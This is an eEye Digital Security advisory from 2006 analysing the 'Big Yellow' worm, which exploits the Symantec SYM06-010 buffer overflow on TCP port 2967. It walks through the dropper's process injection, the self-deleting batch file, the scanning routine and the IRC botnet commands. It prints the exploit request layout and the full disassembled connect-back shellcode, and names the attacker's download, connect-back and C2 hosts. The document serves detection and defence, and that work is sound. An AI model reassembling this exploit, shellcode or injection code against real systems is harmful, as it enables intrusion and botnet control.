Worm Alert: Big Yellow
Date:
12/15/2006 12:00:00 AM
Severity:
High
Affected Software:
Symantec Client Security for Windows
3.1 - 3.1.0.394
3.1 - 3.1.0.400
3.0 - 3.0.2.2000
3.0 - 3.0.2.2001
3.0 - 3.0.2.2010
3.0 - 3.0.2.2020
3.0 - 3.0.1.1007
3.0 - 3.0.1.1000
Symantec Antivirus Corporate Edition for Windows
10.1 - 10.1.0.394
10.1 - 10.1.0.400
10.1 - 10.1.0.394 64 bit
10.0 - 10.0.2.2000
10.0 - 10.0.2.2001
10.0 - 10.0.2.2010
10.0 - 10.0.2.2020
10.0 - 10.0.1.1007
10.0 - 10.0.1.1000
Overview:
The eEye Research honeypot network has recently detected a new worm that is actively exploiting a remote Symantec vulnerability originally discovered by eEye Research on May 24, 2006 and patched by Symantec on June 12, 2006. This vulnerability has been publicly exploited as early as November 30, but this is the first example of a worm leveraging this vulnerability for self-propagation. Generally, patch processes are not in place for non-Microsoft applications such as Symantec AntiVirus/Client Security, so many Symantec users may be at risk for this vulnerability throughout their networks. All enterprises running such software should assess their posture against this worm as soon as possible by validating that they have the latest version of Symantec AntiVirus/Client Security as well as blocking port tcp/2967 at the gateway to minimize attackable surface area.
Technical Analysis:
NL.EXE
Worm dropper downloaded from ftp://ftpd.3322.org:21211/NL.eXe via instructions sent to the command shell opened by the SYM06-010 exploit.
1) Sleep for 10 seconds
2) calls CRTDLL.DLL!_access to check for read access to
"%SystemRoot%\system32\wuauclt.dll"; if the call fails, then
"wuauclt.dll" is assumed to not exist, and execution jumps to step 5
3) MoveFileExA(
"%SystemRoot%\system32\wuauclt.dll",
"%SystemRoot%\system32\wuauclt.dll.bak",
MOVEFILE_REPLACE_EXISTING)
- this renames "wuauclt.dll" to "wuauclt.dll.bak"
4) MoveFileExA(
"%SystemRoot%\system32\wuauclt.dll.bak",
NULL,
MOVEFILE_DELAY_UNTIL_REBOOT)
- this marks "wuauclt.dll.bak" to be deleted on reboot
5) decodes the DLL embedded within itself as binary data by XORing each
byte by 0x52
5a) CreateFileA(
"%SystemRoot%\system32\wuauclt.dll",
GENERIC_WRITE,
FILE_SHARE_READ,
NULL,
CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL)
- creates new "wuauclt.dll" file for writing
5b) writes the decoded DLL to the file using WriteFile
6) calls CRTDLL.DLL!_access to check for read access to the newly-created
"%SystemRoot%\system32\wuauclt.dll"; if the call fails, then
"wuauclt.dll" is assumed to not exist, and execution jumps to step 9
7) checks "%SystemRoot%\system32\svchost.exe" for write access using the
following operations, but doesn't do anything with the result:
7a) CreateFileA(
"%SystemRoot%\system32\svchost.exe",
GENERIC_READ,
FILE_SHARE_READ,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL)
- opens "svchost.exe" for read access, to read its file times
7b) calls GetFileTime to retrieve "svchost.exe"'s last-modified,
last-accessed, and creation times
7c) CreateFileA(
"%SystemRoot%\system32\svchost.exe",
GENERIC_WRITE,
FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL)
- opens "svchost.exe" for write access, so it can attempt to
set its file times (to what they already are; this is just an
inert write operation)
7d) calls SetFileTime to restore the file's times
8) injects the new "wuauclt.dll" into the first "svchost.exe" process
encountered via the following operations:
8a) creates a structure for the injected code to use:
+0000h [104h] full path and file name of "wuauclt.dll"
+0104h [104h] command-line argument ("Run" or "Install")
+0208h PTR KERNEL32.DLL!GetProcAddress
+020Ch PTR KERNEL32.DLL!LoadLibraryA
- the command-line argument is "Run" unless main's argv[1] is
"-Install"
8b) searches for a process named "svchost.exe" using the following
operations:
8ba) CreateToolhelp32Snapshot(
TH32CS_SNAPPROCESS,
0)
- this creates a "snapshot" containing an enumeration of
processes currently running on the system
8bb) uses Process32First and Process32Next to iterate through
enumerated processes; searches for a process named
"svchost.exe"
8bc) when a matching process is found, its Process ID (PID) is
passed to OpenProcess at step 8d
8bd) if no matching process is found, execution jumps to step 9
8c) attempts to acquire SeDebugPrivilege using OpenProcessToken,
LookupPrivilegeValueA, and AdjustTokenPrivilege
- SeDebugPrivileges allows even system processes to be opened
with full access
8d) attempts to open the "svchost.exe" process located in steps
8ba..8bd using OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); if
this fails, execution jumps to step 9
8e) VirtualAllocEx(
"svchost.exe" process handle,
NULL,
0x210, (size of structure created at step 8a)
MEM_COMMIT,
PAGE_READWRITE)
- this allocates memory within the target "svchost.exe" process
that will be used to pass information to the injection code;
if this fails, the process handle is closed and execution
jumps to step 9
8f) copies the structure into the memory allocated in the
"svchost.exe" process using WriteProcessMemory; if this fails,
the memory is freed, the process handle is closed, and execution
jumps to step 9
8g) VirtualAllocEx(
"svchost.exe" process handle,
NULL,
0x210,
MEM_COMMIT|MEM_RESERVE,
PAGE_EXECUTE_READWRITE)
- this allocates memory within the target "svchost.exe" process
that will be used to contain the machine code to be injected;
if it fails, all previously allocated memory is freed, the
process handle is closed, and execution jumps to step 9
8h) copies the following machine code into the "svchost.exe" using
WriteProcessMemory; if this fails, all previously allocated
memory is freed, the process handle is closed, and execution
jumps to step 9:
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov edi, [ebp+8] ; ThreadProc's lpvParameter, which points
; to the structure created at step 8a,
; allocated at step 8e, and copied into
; the process at step 8f
push edi ; full file name of "wuauclt.hll"
call dword ptr [edi+208h] ; KERNEL32.DLL!LoadLibraryA
mov esi, eax
or esi, esi
jz short loc_401267
mov eax, edi
add eax, 104h
push eax ; either "Run" or "Install"
push esi
call dword ptr [edi+20Ch] ; KERNEL32.DLL!GetProcAddress
mov [ebp-4], eax
call [ebp-4] ; call "Run" or "Install" export
loc_401267:
xor eax, eax
pop edi
pop esi
leave
ret 4
8i) attempts to execute the injected machine code within the target
"svchost.exe" process using CreateRemoteThread with the
'lpStartAddress' argument pointing to the memory allocated at
step 8g and filled with the code at step 8h; if this fails, all
previously allocated memory is freed, the process handle is
closed, and execution jumps to step 9
8j) the newly-created thread's handle and the "svchost.exe" process
handle are both closed
8k) SeDebugPrivilege is disabled for the NL.EXE process using the
same APIs as in step 8c
9) self-destructs by creating a batch file that will continuously attempt
to delete the NL.EXE file, then runs the batch file:
9a) retrieves the full path and file name of the NL.EXE executable
using GetModuleHandle with an 'hModule' argument of NULL; this
will be used later when constructing the batch file
9b) builds a random batch file name of the form "%TMP%NL###.bat",
where each # represents a random digit from 0 to 8, generated
using (CRTDLL.DLL!rand() % 9); the random number generator is
apparently never seeded, so this batch file name should be the
same every time
9c) SetFileAttributesA(
full path and file name of "NL.EXE",
FILE_ATTRIBUTE_NORMAL)
- resets file attributes on "NL.EXE", perhaps just to make sure
the file isn't read-only
9d) CreateFileA(
batch file name,
GENERIC_WRITE,
0,
NULL,
CREATE_ALWAYS,
0,
NULL)
- this creates the new batch file with write access; if this
fails, the program ends
9e) writes the following contents to the batch file, using WriteFile,
then closes the handle to the batch file
@ECHO OFF
:Repeat
DEL "full path and file name of NL.EXE"
Ping 0.0.0.0
IF EXIST "%s" GOTO Repeat
DEL "%0"
- "Ping 0.0.0.0" is presumably intended to insert a brief delay
between deletion attempts, while the "DEL %0" command causes
the batch file to delete itself once the delete loop breaks
- the program ends if WriteFile fails
9f) the batch file is executed using ShellExecuteA
SVCHOST.EXE
Worm propagation core; exploits the SYM06-010 TCP/2967 vulnerability.
1) uses GetModuleFileNameA with an 'hModule' argument of the return value
from GetModuleHandleA(NULL) to get its own file name. If this name
matches "%SystemRoot%\system32\wins\svchost.exe" (case-sensitively),
execution jumps to step 6
2) sets the file attributes of "%SystemRoot%\system32\wins\svchost.exe"
to FILE_ATTRIBUTE_NORMAL using SetFileAttributesA, presumably to remove
the read-only attribute if it is somehow set.
3) copies itself to "%SystemRoot%\system32\wins\svchost.exe" using
CopyFileA; if this fails, execution jumps to step 5 (self-destruct)
4) CreateProcessA(
NULL,
"%SystemRoot%\system32\wins\svchost.exe",
NULL,
NULL,
TRUE,
NORMAL_PRIORITY_CLASS|DETACHED_PROCESS,
NULL,
NULL,
π,
&si)
- this executes the newly copied "svchost.exe"; if it fails, execution
jumps to step 6
- otherwise, the newly copied "svchost.exe" is now running, so the
current one can terminate and be deleted
5) the current executable prepares to self-detruct using the same batch
file technique seen in NL.EXE, then exits with CRTDLL.DLL!exit(0)
5a) retrieves the full path and file name of the current executable
using GetModuleHandle with an 'hModule' argument of NULL; this
will be used later when constructing the batch file
5b) builds a random batch file name of the form "%TMP%NL###.bat",
where each # represents a random digit from 0 to 8, generated
using (CRTDLL.DLL!rand() % 9); the random number generator is
apparently not seeded, so this batch file name should be the
same every time
5c) SetFileAttributesA(
full path and file name of the current executable,
FILE_ATTRIBUTE_NORMAL)
- resets file attributes on the current executable, perhaps just
to make sure the file isn't read-only
5d) CreateFileA(
batch file name,
GENERIC_WRITE,
0,
NULL,
CREATE_ALWAYS,
0,
NULL)
- this creates the new batch file with write access; if this
fails, the program ends
5e) writes the following contents to the batch file, using WriteFile,
then closes the handle to the batch file
@ECHO OFF
:Repeat
DEL "full path and file name of current executable"
Ping 0.0.0.0
IF EXIST "%s" GOTO Repeat
DEL "%0"
- "Ping 0.0.0.0" is presumably intended to insert a brief delay
between deletion attempts, while the "DEL %0" command causes
the batch file to delete itself once the delete loop breaks
- the program ends if WriteFile fails
5f) the batch file is executed using ShellExecuteA
6) initializes Winsock v2.2 using WS2_32.DLL!WSAStartup; if this fails,
the program terminates with return code 0
7) gets the starting IP address for propagation, based on the local
system's first IP address
7a) the output from WS2_32.DLL!gethostname is passed into
WS2_32.DLL!gethostbyname, and the first IP address from the list
is used in the following steps
7b) each IP address is converted to a string using inet_ntoa, then
tokenized and converted back into four numerical octets using
strtok and atoi
7c) if IP address is of the form 192.168.x.x, the starting IP address
is recorded as 192.168.0.1
7d) if IP address is 10.x.x.x, the subnet's starting IP address is
recorded as 10.0.0.1
7e) otherwise, the 3rd octet of the system's IP address is reduced
by 10 (it becomes 0 if less than 10), and the 4th octet is zeroed,
to produce the starting IP address for propagation
- to summarize:
192.168.x.x --> 192.168.0.1
10.x.x.x --> 10.0.0.1
else: a.b.c.d --> a.b.(c-10).0
8) starts 512 exploit threads with CreateThread, then goes dormant using
Sleep(INFINITE); the operations of these exploit threads are described
below, with lettered rather than numbered steps
A) (begin exploitation loop) generates the next target IP address using
the following:
Aa) advance IP octets within the ranges
{10-240}.{0-254}.{0-254}.{1-254}; represented in C:
if (++dwOctet4 > 254)
{
dwOctet4 = 1;
if (++dwOctet3 > 254)
{
dwOctet3 = 0;
if (++dwOctet2 > 254)
{
dwOctet2 = 0;
if (++dwOctet1 > 240)
dwOctet1 = 10;
}
}
}
Ab) rebuilds the octets as an IP address string using itoa, strcpy,
and strcat
B) creates a TCP/IP socket using socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)
C) attempts to connect to TCP port 2967 on the newly generated target IP
address; if this fails, the socket is closed and execution jumps to
step A
D) the SYM06-010 exploit is sent to TCP port 2967 on the target, bearing
connect-back shellcode to spawn a CMD.EXE that will receive commands
from 61.172.250.59:12345
Da) the shellcode is prepared by embedding the above-mentioned IP
address and port into its XOR-encoded (XOR 0x99) portion where
the sockaddr structure is initialized for connect-back
Db) WSAStartup is called again; the exploitation routine aborts if it
fails
Dc) creates a TCP/IP socket with
socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if this fails,
WSACleanup is called and the exploitation routine aborts
Dd) connects to the target IP address on TCP port 2967; if this fails,
the socket is closed, WSACleanup is called, and the routine aborts
De) the SYM06-010 exploit is sent over the connection, the socket is
closed, and WSACleanup is called
WUAUCLT.DLL
"NameLess Eternity Build20061130" bot service component, dropped by NL.EXE and injected into a system process for subsequent self-installation.
- Install opens the registry key “HKLM\SYSTEM\CurrentControlSet\Services\wuauserv” and sets the “Start” value to 2. This essentially turns on automatic update downloading on your computer. It then opens the HKLM\SYSTEM\CurrentControlSet\Services\wuauserv\Parameters key and sets value “ServiceDll” to point to the running exploit DLL.
- Run does the same thing as Install initially. It then checks for an internet connection and loops until it gets one. It then attempts to open a connection to the controlling IRC server. It alternates between NameLess.3322.org and NameLessBak.3322.org.
Once connected, it goes to channel #VNL with password “lol”. Once there, it looks for commands from the person running the show. Below are a list of commands I see in the function and what the response is on some of them:
Available BotNet Commands:
- PING (returns PONG and may execute a JOIN)
- 001 (executes USERHOST, MODE –x +i, JOIN, and MODE -o)
- 005 (looks to be same as 001)
- 302 (looks for an ‘@’ in a local variable, does a string copy, and waits for next command)
- 433 (executes NICK)
- KICK (does lots of string copying and comparing and then executes a JOIN)
- NICK (more strcmp and strncpy)
- PART ?
- QUIT ?
- 353 ?
- NOTICE (evaluating)
- jojogirl (this appears to get info in the form of “[mi] :) -> li -> %s” to get dumped back to the channel via a NOTICE or PRIVMSG)
- 332 (functions similarly to jojogirl with “[mi] :) -> lo -> %s”
- vs (dumps version information to the channel “Build20061130” “NameLess Eternity Version” “[mi] :) -> %s -> %s”
- rm (“[mi] :) -> rm…” followed by the execution of “QUIT ::) -> rm\r\n”, the process then kills itself off and deletes the file on reboot)
- ws (dumps information in the form of "[ts] :) -> %s(%d) k")
- ir (similar "[ir] :) -> %s")
- ct (sets up a locale to the user default, executes a JOIN and dumps "[ct] :) -> %s -> %s")
- ud (dumps "Build20061130" and "[ud] :) -> %s" and spawns a thread to download an updated DLL file if your version doesn’t match the one the channel controller specifies)
- dl (does the same kind of thing as ud, but without the version check)
- s (does a bunch of string copies and dumps info "[s] :) -> %s:%s -> %s" and spawns a thread)
- ss (very similar to s "[ss] :) -> %s:%s -> %s" with strncpy and thread spawning)
Exploit Request
Canned request for the Symantec remote management service on TCP/2967, handled by
Symantec's Rtvscan.exe. The exploit request is contained within the worm's SVCHOST.EXE.
ScsComms.dll header
BYTE 01h ; version = 1
BYTE 10h ; size of message header = 10h
WORD 0F20h ; (big-endian) length of message data
BYTE 0Ah ; message command = 10 (0Ah) for Rtvscan message
BYTE 00h ; response flag = 0 for request, 1 for response
BYTE 00h ; SSL error code (0)
BYTE 00h ; (unused)
DWORD 02180001h ; (big-endian) message ID
DWORD 00h ; (unused)
Rtvscan.exe header
BYTE 00h ; = 0
BYTE 24h ; request command = COM_FORWARD_LOG
BYTE 00h ; = 0
BYTE 14h ; response flag?
DWORD D9D2C9B7h ; (unknown)
DWORD 34EF333Eh ; (unknown)
DWORD 00431F25h ; (unknown)
Rtvscan.exe message body
WORD 0202h ; length of following string (1st)
[202h] "\\/aaa...abbb...b"
WORD 0101h ; length of following string (2nd)
[101h] "\"\"\"...\""
WORD 0101h ; length of following string (3rd)
[101h] "ddd...d"
WORD 0101h ; length of following string (4th)
[101h] "eee...e"
WORD 0101h ; length of following string (5th)
[101h] "fff...f"
WORD 0101h ; length of following string (6th)
[101h] "ggg...g"
WORD 0101h ; length of following string (7th)
[101h] "hhh...h"
WORD 0101h ; length of following string (8th)
[101h] "iii...i"
WORD 0101h ; length of following string (9th)
[101h] "jjj...j"
WORD 0101h ; length of following string (10th)
[101h] "kkk...k"
WORD 0101h ; length of following string (11th)
[...] "lll...lAA" (shellcode) "mmm...m",0
SHELLCODE
Standard connect-back shellcode embedded in the SYM06-010 exploit request contained within the worm's SVCHOST.EXE.
;;
;; XOR-0x99 decode loop
;;
jmp short loc_403BA8
dd 501E100Dh ; "return address" in CBA.DLL for SEH overflow
; (code at address is "POP ECX / POP ECX / RET")
db "mm"
loc_403BA8:
jmp short loc_403BB9
loc_403BAA:
pop ebx
xor ecx, ecx
mov cx, 214h
loc_403BB1: ; XOR-0x99 decode loop
xor byte ptr [ebx], 99h
inc ebx
loop loc_403BB1
jmp short loc_403BBE
loc_403BB9:
call loc_403BAA ; push pointer to XOR-encoded portion
loc_403BBE:
;;
;; XOR-0x99-encoded portion
;;
jmp loc_FB
loc_5:
pop edx ; EDX -> "GetProcAddress",0
mov eax, fs:[30h] ; -> PEB
mov eax, [eax+0Ch] ; -> PEB loader data
mov esi, [eax+1Ch] ; InInitializationOrderModuleList
lodsd ; second module in initialization-order list
mov eax, [eax+8] ; LDR_MODULE.BaseAddress
mov ebx, eax ; EBX = base address of KERNEL32.DLL
mov esi, [ebx+3Ch] ; IMAGE_DOS_HEADER.e_lfanew
add esi, ebx
mov esi, [esi+78h] ; IMAGE_NT_HEADERS.OptionalHeader.DataDirectory[
; IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress
add esi, ebx ; ESI -> KERNEL32.DLL export directory
mov edi, [esi+20h] ; IMAGE_EXPORT_DIRECTORY.AddressOfNames
add edi, ebx
mov ecx, [esi+14h] ; IMAGE_EXPORT_DIRECTORY.NumberOfFunctions
xor ebp, ebp
push esi z
loc_2D:
push edi ; GetProcAddress export lookup loop
push ecx
mov edi, [edi]
add edi, ebx
mov esi, edx
push 0Eh ; length of "GetProcAddress"
pop ecx
repe cmpsb
je short loc_44
pop ecx
pop edi
add edi, 4
inc ebp
loop loc_2D
loc_44:
pop ecx
pop edi
pop esi
mov ecx, ebp
mov eax, [esi+24h] ; IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals
add eax, ebx
shl ecx, 1
add eax, ecx
xor ecx, ecx
mov cx, [eax]
mov eax, [esi+1Ch] ; IMAGE_EXPORT_DIRECTORY.AddressOfFunctions
add eax, ebx
shl ecx, 2
add eax, ecx
mov eax, [eax]
add eax, ebx ; EAX = KERNEL32.DLL!GetProcAddress
mov edi, edx
mov esi, edi
add esi, 0Eh ; EDI -> strings after "GetProcAddress",0
mov edx, eax
push 3
pop ecx
call _lookup_exports_from_module_ebx
add esi, 0Dh ; skip over "LoadLibraryA",0 string
push edx
push esi ; ESI -> "ws2_32",0
call dword ptr [edi-4] ; LoadLibraryA
pop edx
mov ebx, eax ; EBX = base address of WS2_32.DLL
push 2
pop ecx
call _lookup_exports_from_module_ebx
; EDI-18h KERNEL32.DLL!GetProcAddress
; EDI-14h KERNEL32.DLL!CreateProcessA
; EDI-10h KERNEL32.DLL!ExitThread
; EDI-0Ch KERNEL32.DLL!LoadLibraryA
; EDI-08h WS2_32.DLL!WSASocketA
; EDI-04h WS2_32.DLL!connect
sub esp, 44h ; allocate stack space for STARTUPINFO
mov esi, esp
push 10h
pop ecx
loc_91:
mov [esi+ecx*4], eax ; STARTUPINFOA = {0} loop
loop loc_91
push eax
push eax
push eax
push eax
push 1
push 2
call dword ptr [edi-8] ; WSASocketA(AF_INET, SOCK_STREAM, 0, 0, 0, 0)
mov ebx, eax
mov [esi+38h], ebx
mov [esi+3Ch], ebx
mov [esi+40h], ebx
mov word ptr [esi+2Ch], 101h ; STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW
lea eax, [edi+10h]
push eax
push esi
xor eax, eax
push eax
push eax
push eax
push 1 ; CreateProcessA: bInheritHandles = TRUE
push eax
push eax
lea edx, [edi+3Ch]
mov dword ptr [edx], 646D63h ; "cmd",0
push edx
push eax
call dword ptr [edi-14h] ; KERNEL32.DLL!CreateProcessA
mov dword ptr [edi], 39300002h ; AF_INET / htons(12345)
mov dword ptr [edi+4], 100007Fh ; 127.0.0.1
push 10h
push edi
push ebx
call dword ptr [edi-4] ; WS2_32.DLL!connect
push eax
call dword ptr [edi-10h] ; KERNEL32.DLL!ExitThread
_lookup_exports_from_module_ebx proc
xor eax, eax ; advance past current string at ESI
lodsb
test eax, eax
jnz short _lookup_exports_from_module_ebx
push ecx
push edx
push esi
push ebx
call edx ; KERNEL32.DLL!GetProcAddress
pop edx
pop ecx
stosd
loop _lookup_exports_from_module_ebx
xor eax, eax
ret
_lookup_exports_from_module_ebx endp
loc_FB:
call loc_5 ; pushes pointer to string table
db "GetProcAddress",0
db "CreateProcessA",0
db "ExitThread",0
db "LoadLibraryA",0
db "ws2_32",0
db "WSASocketA",0
db "connect",0Detection:
eEye Digital Security's Retina Scanner has scanned for this vulnerability since its patch release on May 24, 2006 with RTH 4657: "Symantec Remote Management Stack Buffer Overflow". This audit will identify all hosts that are affected by this vulnerability and are at risk for exploitation by this worm.
Prevention:
Users of eEye Digital Security's Blink have been protected against this vulnerability since its discovery at two different layers:
- Intrusion Prevention System
Blink's IPS functionality has successfully mitigated this attack at the network layer since its discovery on June 12, 2006. Therefore, customers should ensure that Blink's IPS is enabled and that it is not configured in a Passive mode in order to utilize this IPS signature.
- Application Protection
If the network IPS is disabled by the user, the next layer of defense is Blink's Application Protection, which will generically prevent this buffer overflow attack. Please make sure to verify your Application Protection policy option is set to "Terminate process and restart on malicious API calls" by default.
If both settings are enabled, Blink customers would have two distinct lines of defense against this specific worm to keep their hosts secure.
Links:
Blink Personal - Unified Client Security - Free For Home Use
Blink Professional - Unified Client Security - Free Trial
Retina Network Security Scanner - Trial
Copyright ©1998-2010 eEye Digital Security
Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please email alert@eEye.com for permission.
Disclaimer
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.